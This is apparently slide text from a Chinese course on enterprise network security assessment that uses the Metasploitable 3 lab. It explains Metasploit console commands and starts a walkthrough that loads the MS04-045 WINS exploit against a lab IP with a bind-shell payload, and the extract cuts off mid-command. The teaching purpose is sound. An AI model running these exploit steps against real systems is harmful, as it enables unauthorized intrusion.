《企业网安全评估和运维》教学案例-课件-Metasploitable 3

项目案例-企业网安全评估和运维-

Metasploitable3

page2工具简介etasploit是一款开源的安全漏洞检测工具，同时Metasploit是免费的工具，因此安全工作人员常用Metasploit工具来检测系统的安全性。MetasploitFramework(MSF)在2003年以开放源码方式发布，是可以自由获取的开发框架。它是一个强大的开源平台，供开发，测试和使用恶意代码，这个环境为渗透测试、shellcode编写和漏洞研究提供了一个可靠平台。这种可以扩展的模型将负载控制(payload)、编码器(encode)、无操作生成器(nops)和漏洞整合在一起，使MetasploitFramework成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的shellcode，并且不断更新。目前的版本收集了数百个实用的溢出攻击程序及一些辅助工具，让人们使用简单的方法完成安全漏洞检测，即使一个不懂安全的人也可以轻松的使用它。当然，它并不只是一个简单的收集工具，提供了所有的类和方法，让开发人员使用这些代码方便快速的进行二次开发。其核心中一小部分由汇编和C语言实现，其余由ruby实现。不建议修改汇编和C语言部分。2page2使用方法showexploits列出metasploit框架中的所有渗透攻击模块。

showpayloads列出metasploit框架中的所有攻击载荷。

showauxiliary列出metasploit框架中的所有辅助攻击载荷。

searchname查找metasploit框架中所有的渗透攻击和其他模块。

info展示出制定渗透攻击或模块的相关信息。

usename装载一个渗透攻击或模块。

LHOST你本地可以让目标主机连接的IP地址，通常当目标主机不在同一个局域网内时，就需要是一个公共IP地址，特别为反弹式shell使用。

RHOST远程主机或是目标主机。

setfunction设置特定的配置参数（EG：设置本地或远程主机参数）。

setgfunction以全局方式设置特定的配置参数（EG：设置本地或远程主机参数）。

showoptions列出某个渗透攻击或模块中所有的配置参数。

3page2使用方法showtargets列出渗透攻击所有支持的目标平台。

settargetnum指定你所知道的目标的操作系统以及补丁版本类型。

setpayloadname指定想要使用的攻击载荷。

showadvanced列出所有高级配置选项。

setautorunscriptmigrate-f.在渗透攻击完成后，将自动迁移到另一个进程。

check检测目标是否选定渗透攻击存在相应的安全漏洞。

exploit执行渗透攻击或模块来攻击目标。

exploit-j在计划任务下进行渗透攻击（攻击将在后台进行）。

exploit-z渗透攻击完成后不与回话进行交互。

exploit-eencoder制定使用的攻击载荷编码方式（EG：exploit-eshikata_ga_nai）。

exploit-h列出exploit命令的帮助信息。

4page2使用实例showexploits

infoexploit/windows/wins/ms04_045_wins

查看其描述信息5使用实例

useexploit/windows/wins/ms04_045_wins

使用此exploitshowoptions

查看相应的选项6page2使用实例setRHOST192.168.1.200设置目标setRPORT7777设置端口setPAYLOADgeneric/shell_bind_